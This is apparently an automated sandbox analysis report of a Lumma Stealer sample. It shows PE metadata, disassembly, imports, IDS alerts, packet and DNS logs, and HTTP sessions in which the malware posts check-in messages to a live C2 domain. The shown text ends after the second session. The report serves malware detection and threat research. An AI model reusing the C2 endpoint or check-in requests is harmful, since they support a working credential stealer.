          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Time Stamp:0x6634E6D5 [Fri May 3 13:29:57 2024 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:6
          OS Version Minor:0
          File Version Major:6
          File Version Minor:0
          Subsystem Version Major:6
          Subsystem Version Minor:0
          Import Hash:f23588e58d9b5c75df2f16b529527a2e
          Instruction
          call 00007F69D48172DBh
          jmp 00007F69D4816B39h
          push ebp
          mov ebp, esp
          jmp 00007F69D4816CCFh
          push dword ptr [ebp+08h]
          call 00007F69D48225B1h
          pop ecx
          test eax, eax
          je 00007F69D4816CD1h
          push dword ptr [ebp+08h]
          call 00007F69D481D919h
          pop ecx
          test eax, eax
          je 00007F69D4816CA8h
          pop ebp
          ret
          cmp dword ptr [ebp+08h], FFFFFFFFh
          je 00007F69D48139A8h
          jmp 00007F69D4814AB9h
          push ebp
          mov ebp, esp
          push dword ptr [ebp+08h]
          call 00007F69D48175C3h
          pop ecx
          pop ebp
          ret
          cmp ecx, dword ptr [0042D040h]
          jne 00007F69D4816CC3h
          ret
          jmp 00007F69D48175DFh
          mov ecx, dword ptr [ebp-0Ch]
          mov dword ptr fs:[00000000h], ecx
          pop ecx
          pop edi
          pop edi
          pop esi
          pop ebx
          mov esp, ebp
          pop ebp
          push ecx
          ret
          mov ecx, dword ptr [ebp-10h]
          xor ecx, ebp
          call 00007F69D4816C99h
          jmp 00007F69D4816CA2h
          push eax
          push dword ptr fs:[00000000h]
          lea eax, dword ptr [esp+0Ch]
          sub esp, dword ptr [esp+0Ch]
          push ebx
          push esi
          push edi
          mov dword ptr [eax], ebp
          mov ebp, eax
          mov eax, dword ptr [0042D040h]
          xor eax, ebp
          push eax
          push dword ptr [ebp-04h]
          mov dword ptr [ebp-04h], FFFFFFFFh
          lea eax, dword ptr [ebp-0Ch]
          mov dword ptr fs:[00000000h], eax
          ret
          push eax
          push dword ptr fs:[00000000h]
          lea eax, dword ptr [esp+0Ch]
          sub esp, dword ptr [esp+0Ch]
          push ebx
          push esi
          push edi
          mov dword ptr [eax], ebp
          mov ebp, eax
          mov eax, dword ptr [0042D040h]
          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0x830000xdae.INV
          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x810000x1a6c.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0x2aba80x1c.DAX
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2aae80x40.DAX
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x230000x13c.DAX
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000x211ef0x21200cc51c6f65a5e51c9015def07988f5938False0.583262087264151data6.64090329332346IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .DAX0x230000x9cf60x9e007b1b09f50a89ab15ae62d26f668f64eeFalse0.43421182753164556data4.953928845663177IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data0x2d0000x1d540x100096f6fc94400f9b3c80d126cafa6f2df3False0.190673828125data3.018020491461944IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .Left0x2f0000x510c40x51200c7183028291c3a4d7fdf1b6f8c8b05faFalse0.998236469568567OpenPGP Public Key7.999212238267937IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .reloc0x810000x1a6c0x1c006f40397f4829021ef609cc1670e7efd9False0.7197265625data6.348967303435409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
          .INV0x830000xdae0xde00b2382c6356dde49d143d0236613e527aFalse0.029402449324324325data0.5552536644324805IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          DLLImport
          USER32.DLLOpenIcon, RegisterRawInputDevices, OemToCharBuffW, TranslateAccelerator, EvaluateProximityToRect, DrawTextA, DrawStateA, IsCharAlphaNumericW, RegisterClipboardFormatA, LoadKeyboardLayoutA, EnumDisplaySettingsW, DdeCreateStringHandleA, OemToCharA, SendMessageTimeoutW, GetIconInfoExW, InvertRect, GetSystemMenu, FreeDDElParam, SetCursor, GetWindowContextHelpId, PrintWindow, DwmGetDxSharedSurface, ReleaseDwmHitTestWaiters, OpenWindowStationW, DwmGetRemoteSessionOcclusionEvent, GetParent, TrackPopupMenuEx, _UserTestTokenForInteractive, DdeQueryStringW, ScrollChildren
          KERNEL32.DLLLoadLibraryExW, CreateFileW, VirtualProtect, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetModuleHandleW, GetCurrentProcess, TerminateProcess, HeapSize, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, WriteConsoleW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, GetFileType, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileSizeEx, SetFilePointerEx, CloseHandle, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, GetProcessHeap, ReadConsoleW
          MSVCRT.DLL_mbsupr_s, _set_errno, _wtoi64, _mbsnextc_l, _islower_l, _wutime64, _vfwprintf_l, __pwctype_func, _mktemp, _popen, __CxxCallUnwindDtor, _fwscanf_s_l, _gcvt, _sprintf_l, _cwscanf_l, _wcstoul_l, _wtempnam_dbg, _vcprintf, __ExceptionPtrCopy, _swprintf_s_l, _get_environ, _mbscpy, _fprintf_s_l, _wspawnvpe, exit
          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
          05/04/24-22:22:48.334726UDP2052368ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (pearcyworkeronej .shop)4973153192.168.2.41.1.1.1
          05/04/24-22:22:56.178293TCP2052369ET TROJAN Observed Lumma Stealer Related Domain (pearcyworkeronej .shop in TLS SNI)49735443192.168.2.4172.67.131.204
          05/04/24-22:22:57.267481TCP2052369ET TROJAN Observed Lumma Stealer Related Domain (pearcyworkeronej .shop in TLS SNI)49736443192.168.2.4172.67.131.204
          05/04/24-22:22:53.534195TCP2052369ET TROJAN Observed Lumma Stealer Related Domain (pearcyworkeronej .shop in TLS SNI)49734443192.168.2.4172.67.131.204
          05/04/24-22:22:49.603300TCP2052369ET TROJAN Observed Lumma Stealer Related Domain (pearcyworkeronej .shop in TLS SNI)49731443192.168.2.4172.67.131.204
          05/04/24-22:22:52.371820TCP2052369ET TROJAN Observed Lumma Stealer Related Domain (pearcyworkeronej .shop in TLS SNI)49733443192.168.2.4172.67.131.204
          05/04/24-22:22:58.672362TCP2052369ET TROJAN Observed Lumma Stealer Related Domain (pearcyworkeronej .shop in TLS SNI)49737443192.168.2.4172.67.131.204
          05/04/24-22:22:51.059487TCP2052369ET TROJAN Observed Lumma Stealer Related Domain (pearcyworkeronej .shop in TLS SNI)49732443192.168.2.4172.67.131.204
          05/04/24-22:22:48.500879TCP2052369ET TROJAN Observed Lumma Stealer Related Domain (pearcyworkeronej .shop in TLS SNI)49730443192.168.2.4172.67.131.204
          TimestampSource PortDest PortSource IPDest IP
          May 4, 2024 22:22:48.497545004 CEST49730443192.168.2.4172.67.131.204
          May 4, 2024 22:22:48.497623920 CEST44349730172.67.131.204192.168.2.4
          May 4, 2024 22:22:48.497731924 CEST49730443192.168.2.4172.67.131.204
          May 4, 2024 22:22:48.500879049 CEST49730443192.168.2.4172.67.131.204
          May 4, 2024 22:22:48.500916004 CEST44349730172.67.131.204192.168.2.4
          May 4, 2024 22:22:48.829025984 CEST44349730172.67.131.204192.168.2.4
          May 4, 2024 22:22:48.829128027 CEST49730443192.168.2.4172.67.131.204
          May 4, 2024 22:22:48.831804037 CEST49730443192.168.2.4172.67.131.204
          May 4, 2024 22:22:48.831820965 CEST44349730172.67.131.204192.168.2.4
          May 4, 2024 22:22:48.832310915 CEST44349730172.67.131.204192.168.2.4
          May 4, 2024 22:22:48.877679110 CEST49730443192.168.2.4172.67.131.204
          May 4, 2024 22:22:48.877679110 CEST49730443192.168.2.4172.67.131.204
          May 4, 2024 22:22:48.877815962 CEST44349730172.67.131.204192.168.2.4
          May 4, 2024 22:22:49.579178095 CEST44349730172.67.131.204192.168.2.4
          May 4, 2024 22:22:49.579303980 CEST44349730172.67.131.204192.168.2.4
          May 4, 2024 22:22:49.579380989 CEST49730443192.168.2.4172.67.131.204
          May 4, 2024 22:22:49.598860979 CEST49730443192.168.2.4172.67.131.204
          May 4, 2024 22:22:49.598917961 CEST44349730172.67.131.204192.168.2.4
          May 4, 2024 22:22:49.602843046 CEST49731443192.168.2.4172.67.131.204
          May 4, 2024 22:22:49.602870941 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:49.602946043 CEST49731443192.168.2.4172.67.131.204
          May 4, 2024 22:22:49.603300095 CEST49731443192.168.2.4172.67.131.204
          May 4, 2024 22:22:49.603313923 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:49.918915033 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:49.919009924 CEST49731443192.168.2.4172.67.131.204
          May 4, 2024 22:22:50.008554935 CEST49731443192.168.2.4172.67.131.204
          May 4, 2024 22:22:50.008569002 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:50.009458065 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:50.053241968 CEST49731443192.168.2.4172.67.131.204
          May 4, 2024 22:22:50.236330032 CEST49731443192.168.2.4172.67.131.204
          May 4, 2024 22:22:50.236330032 CEST49731443192.168.2.4172.67.131.204
          May 4, 2024 22:22:50.236550093 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:50.984241009 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:50.984322071 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:50.984366894 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:50.984375954 CEST49731443192.168.2.4172.67.131.204
          May 4, 2024 22:22:50.984395027 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:50.984431982 CEST49731443192.168.2.4172.67.131.204
          May 4, 2024 22:22:50.984438896 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:50.984750032 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:50.984786034 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:50.984788895 CEST49731443192.168.2.4172.67.131.204
          May 4, 2024 22:22:50.984800100 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:50.984832048 CEST49731443192.168.2.4172.67.131.204
          May 4, 2024 22:22:50.985323906 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:50.985682011 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:50.985719919 CEST49731443192.168.2.4172.67.131.204
          May 4, 2024 22:22:50.985727072 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:50.986377954 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:50.986416101 CEST49731443192.168.2.4172.67.131.204
          May 4, 2024 22:22:50.986423016 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:50.986526966 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:50.986583948 CEST49731443192.168.2.4172.67.131.204
          May 4, 2024 22:22:51.021748066 CEST49731443192.168.2.4172.67.131.204
          May 4, 2024 22:22:51.021764040 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:51.021778107 CEST49731443192.168.2.4172.67.131.204
          May 4, 2024 22:22:51.021781921 CEST44349731172.67.131.204192.168.2.4
          May 4, 2024 22:22:51.059062004 CEST49732443192.168.2.4172.67.131.204
          May 4, 2024 22:22:51.059093952 CEST44349732172.67.131.204192.168.2.4
          May 4, 2024 22:22:51.059185982 CEST49732443192.168.2.4172.67.131.204
          May 4, 2024 22:22:51.059487104 CEST49732443192.168.2.4172.67.131.204
          May 4, 2024 22:22:51.059499025 CEST44349732172.67.131.204192.168.2.4
          May 4, 2024 22:22:51.373191118 CEST44349732172.67.131.204192.168.2.4
          May 4, 2024 22:22:51.373284101 CEST49732443192.168.2.4172.67.131.204
          May 4, 2024 22:22:51.374557972 CEST49732443192.168.2.4172.67.131.204
          May 4, 2024 22:22:51.374567986 CEST44349732172.67.131.204192.168.2.4
          May 4, 2024 22:22:51.374900103 CEST44349732172.67.131.204192.168.2.4
          May 4, 2024 22:22:51.376085997 CEST49732443192.168.2.4172.67.131.204
          May 4, 2024 22:22:51.376209021 CEST49732443192.168.2.4172.67.131.204
          May 4, 2024 22:22:51.376280069 CEST44349732172.67.131.204192.168.2.4
          May 4, 2024 22:22:51.376382113 CEST49732443192.168.2.4172.67.131.204
          May 4, 2024 22:22:51.376394987 CEST44349732172.67.131.204192.168.2.4
          May 4, 2024 22:22:52.268080950 CEST44349732172.67.131.204192.168.2.4
          May 4, 2024 22:22:52.268467903 CEST44349732172.67.131.204192.168.2.4
          May 4, 2024 22:22:52.268539906 CEST49732443192.168.2.4172.67.131.204
          May 4, 2024 22:22:52.271702051 CEST49732443192.168.2.4172.67.131.204
          May 4, 2024 22:22:52.271723986 CEST44349732172.67.131.204192.168.2.4
          May 4, 2024 22:22:52.353688002 CEST49733443192.168.2.4172.67.131.204
          May 4, 2024 22:22:52.353728056 CEST44349733172.67.131.204192.168.2.4
          May 4, 2024 22:22:52.353792906 CEST49733443192.168.2.4172.67.131.204
          May 4, 2024 22:22:52.371819973 CEST49733443192.168.2.4172.67.131.204
          May 4, 2024 22:22:52.371834993 CEST44349733172.67.131.204192.168.2.4
          May 4, 2024 22:22:52.688962936 CEST44349733172.67.131.204192.168.2.4
          May 4, 2024 22:22:52.689168930 CEST49733443192.168.2.4172.67.131.204
          May 4, 2024 22:22:52.690345049 CEST49733443192.168.2.4172.67.131.204
          May 4, 2024 22:22:52.690354109 CEST44349733172.67.131.204192.168.2.4
          May 4, 2024 22:22:52.690630913 CEST44349733172.67.131.204192.168.2.4
          May 4, 2024 22:22:52.691785097 CEST49733443192.168.2.4172.67.131.204
          May 4, 2024 22:22:52.691895962 CEST49733443192.168.2.4172.67.131.204
          May 4, 2024 22:22:52.691926003 CEST44349733172.67.131.204192.168.2.4
          May 4, 2024 22:22:53.449810028 CEST44349733172.67.131.204192.168.2.4
          May 4, 2024 22:22:53.449913025 CEST44349733172.67.131.204192.168.2.4
          May 4, 2024 22:22:53.450014114 CEST49733443192.168.2.4172.67.131.204
          May 4, 2024 22:22:53.450139999 CEST49733443192.168.2.4172.67.131.204
          May 4, 2024 22:22:53.450164080 CEST44349733172.67.131.204192.168.2.4
          May 4, 2024 22:22:53.533775091 CEST49734443192.168.2.4172.67.131.204
          May 4, 2024 22:22:53.533817053 CEST44349734172.67.131.204192.168.2.4
          May 4, 2024 22:22:53.533891916 CEST49734443192.168.2.4172.67.131.204
          May 4, 2024 22:22:53.534194946 CEST49734443192.168.2.4172.67.131.204
          May 4, 2024 22:22:53.534209013 CEST44349734172.67.131.204192.168.2.4
          May 4, 2024 22:22:53.845582962 CEST44349734172.67.131.204192.168.2.4
          May 4, 2024 22:22:53.845820904 CEST49734443192.168.2.4172.67.131.204
          May 4, 2024 22:22:53.848186970 CEST49734443192.168.2.4172.67.131.204
          May 4, 2024 22:22:53.848193884 CEST44349734172.67.131.204192.168.2.4
          May 4, 2024 22:22:53.848427057 CEST44349734172.67.131.204192.168.2.4
          May 4, 2024 22:22:53.849709988 CEST49734443192.168.2.4172.67.131.204
          May 4, 2024 22:22:53.849849939 CEST49734443192.168.2.4172.67.131.204
          May 4, 2024 22:22:53.849880934 CEST44349734172.67.131.204192.168.2.4
          May 4, 2024 22:22:53.849958897 CEST49734443192.168.2.4172.67.131.204
          May 4, 2024 22:22:53.849967003 CEST44349734172.67.131.204192.168.2.4
          May 4, 2024 22:22:54.636591911 CEST44349734172.67.131.204192.168.2.4
          May 4, 2024 22:22:54.637003899 CEST44349734172.67.131.204192.168.2.4
          May 4, 2024 22:22:54.637177944 CEST49734443192.168.2.4172.67.131.204
          May 4, 2024 22:22:54.655247927 CEST49734443192.168.2.4172.67.131.204
          May 4, 2024 22:22:54.655281067 CEST44349734172.67.131.204192.168.2.4
          May 4, 2024 22:22:56.177694082 CEST49735443192.168.2.4172.67.131.204
          May 4, 2024 22:22:56.177738905 CEST44349735172.67.131.204192.168.2.4
          May 4, 2024 22:22:56.177809954 CEST49735443192.168.2.4172.67.131.204
          May 4, 2024 22:22:56.178292990 CEST49735443192.168.2.4172.67.131.204
          May 4, 2024 22:22:56.178306103 CEST44349735172.67.131.204192.168.2.4
          May 4, 2024 22:22:56.492996931 CEST44349735172.67.131.204192.168.2.4
          May 4, 2024 22:22:56.493185043 CEST49735443192.168.2.4172.67.131.204
          May 4, 2024 22:22:56.494360924 CEST49735443192.168.2.4172.67.131.204
          May 4, 2024 22:22:56.494369984 CEST44349735172.67.131.204192.168.2.4
          May 4, 2024 22:22:56.494688988 CEST44349735172.67.131.204192.168.2.4
          May 4, 2024 22:22:56.495754957 CEST49735443192.168.2.4172.67.131.204
          May 4, 2024 22:22:56.495857000 CEST49735443192.168.2.4172.67.131.204
          May 4, 2024 22:22:56.495887041 CEST44349735172.67.131.204192.168.2.4
          May 4, 2024 22:22:57.251162052 CEST44349735172.67.131.204192.168.2.4
          May 4, 2024 22:22:57.251301050 CEST44349735172.67.131.204192.168.2.4
          May 4, 2024 22:22:57.251388073 CEST49735443192.168.2.4172.67.131.204
          May 4, 2024 22:22:57.251418114 CEST49735443192.168.2.4172.67.131.204
          May 4, 2024 22:22:57.266966105 CEST49736443192.168.2.4172.67.131.204
          May 4, 2024 22:22:57.267009020 CEST44349736172.67.131.204192.168.2.4
          May 4, 2024 22:22:57.267124891 CEST49736443192.168.2.4172.67.131.204
          May 4, 2024 22:22:57.267481089 CEST49736443192.168.2.4172.67.131.204
          May 4, 2024 22:22:57.267498970 CEST44349736172.67.131.204192.168.2.4
          May 4, 2024 22:22:57.579824924 CEST44349736172.67.131.204192.168.2.4
          May 4, 2024 22:22:57.580149889 CEST49736443192.168.2.4172.67.131.204
          May 4, 2024 22:22:57.585406065 CEST49736443192.168.2.4172.67.131.204
          May 4, 2024 22:22:57.585429907 CEST44349736172.67.131.204192.168.2.4
          May 4, 2024 22:22:57.585767031 CEST44349736172.67.131.204192.168.2.4
          May 4, 2024 22:22:57.587198019 CEST49736443192.168.2.4172.67.131.204
          May 4, 2024 22:22:57.587403059 CEST49736443192.168.2.4172.67.131.204
          May 4, 2024 22:22:57.587415934 CEST44349736172.67.131.204192.168.2.4
          May 4, 2024 22:22:58.374918938 CEST44349736172.67.131.204192.168.2.4
          May 4, 2024 22:22:58.375082016 CEST44349736172.67.131.204192.168.2.4
          May 4, 2024 22:22:58.375251055 CEST49736443192.168.2.4172.67.131.204
          May 4, 2024 22:22:58.375252008 CEST49736443192.168.2.4172.67.131.204
          May 4, 2024 22:22:58.671936035 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:58.671976089 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:22:58.672072887 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:58.672362089 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:58.672379971 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:22:58.678277969 CEST49736443192.168.2.4172.67.131.204
          May 4, 2024 22:22:58.678318977 CEST44349736172.67.131.204192.168.2.4
          May 4, 2024 22:22:58.987936974 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:22:58.988014936 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:58.989687920 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:58.989696980 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:22:58.990041018 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:22:58.991425037 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:58.992326021 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:58.992366076 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:22:58.992482901 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:58.992523909 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:22:58.992674112 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:58.992711067 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:22:58.992865086 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:58.992893934 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:22:58.993092060 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:58.993120909 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:22:58.993323088 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:58.993357897 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:59.036138058 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:22:59.036370039 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:59.036411047 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:59.080118895 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:22:59.080327034 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:59.080374956 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:59.080389977 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:59.124125957 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:22:59.124326944 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:59.124372959 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:59.172111988 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:22:59.172301054 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:59.220118999 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:22:59.292660952 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:22:59.292793036 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:22:59.292862892 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:22:59.292890072 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:22:59.484277010 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:23:01.511112928 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:23:01.511389971 CEST49737443192.168.2.4172.67.131.204
          May 4, 2024 22:23:01.511390924 CEST44349737172.67.131.204192.168.2.4
          May 4, 2024 22:23:01.511450052 CEST49737443192.168.2.4172.67.131.204
          TimestampSource PortDest PortSource IPDest IP
          May 4, 2024 22:22:48.334726095 CEST4973153192.168.2.41.1.1.1
          May 4, 2024 22:22:48.493444920 CEST53497311.1.1.1192.168.2.4
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          May 4, 2024 22:22:48.334726095 CEST192.168.2.41.1.1.10x27a3Standard query (0)pearcyworkeronej.shopA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          May 4, 2024 22:22:48.493444920 CEST1.1.1.1192.168.2.40x27a3No error (0)pearcyworkeronej.shop172.67.131.204A (IP address)IN (0x0001)false
          May 4, 2024 22:22:48.493444920 CEST1.1.1.1192.168.2.40x27a3No error (0)pearcyworkeronej.shop104.21.4.79A (IP address)IN (0x0001)false
          • pearcyworkeronej.shop
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.449730172.67.131.2044436676C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          TimestampBytes transferredDirectionData
          2024-05-04 20:22:48 UTC268OUTPOST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: pearcyworkeronej.shop
          2024-05-04 20:22:48 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
          Data Ascii: act=life
          2024-05-04 20:22:49 UTC814INHTTP/1.1 200 OK
          Date: Sat, 04 May 2024 20:22:49 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: PHPSESSID=prp70o9p7b4evpbhue8devv4jg; expires=Wed, 28-Aug-2024 14:09:28 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fXlY9%2Bj5vAOgC%2B32rIHb%2FI%2F9fhxHNvn%2F43TC9QIdXFnWsSiamVwDx4lCc6fkfMEgl06e0fdfoHrQCgpnSAp5PC6t2F%2BYB7or8H5VDX4fnZ5wL0iVgqZn4Qiw57uacqtoUl9OS2%2F2i18%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 87eb347ccb4c2a85-LAX
          alt-svc: h3=":443"; ma=86400
          2024-05-04 20:22:49 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
          Data Ascii: 2ok
          2024-05-04 20:22:49 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination Port
          1192.168.2.449731172.67.131.204443
          TimestampBytes transferredDirectionData
          2024-05-04 20:22:50 UTC269OUTPOST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 49
          Host: pearcyworkeronej.shop
          2024-05-04 20:22:50 UTC49OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 75 59 59 33 4e 49 2d 2d 26 6a 3d 64 65 66 61 75 6c 74
          Data Ascii: act=recive_message&ver=4.0&lid=uYY3NI--&j=default
          2024-05-04 20:22:50 UTC808INHTTP/1.1 200 OK
          Date: Sat, 04 May 2024 20:22:50 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: close
          Set-Cookie: PHPSESSID=v6ju9m0pigtevv3t82d6llcsen; expires=Wed, 28-Aug-2024 14:09:29 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y%2BxJKStwZAy9LPNV1cCQZ3nsREcEX0QElOrd6SXgUfkWuK6GZl1fykf%2FQSyhEQSAbr77Bj%2BgTriGBecZ0pjZSDGNNgYTESSzYkN6woC8adHKV%2FrtXxt33Hgzumi3dXloDMGD8Pww9y4%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 87eb348478672f21-LAX
          alt-svc: h3=":443"; ma=86400
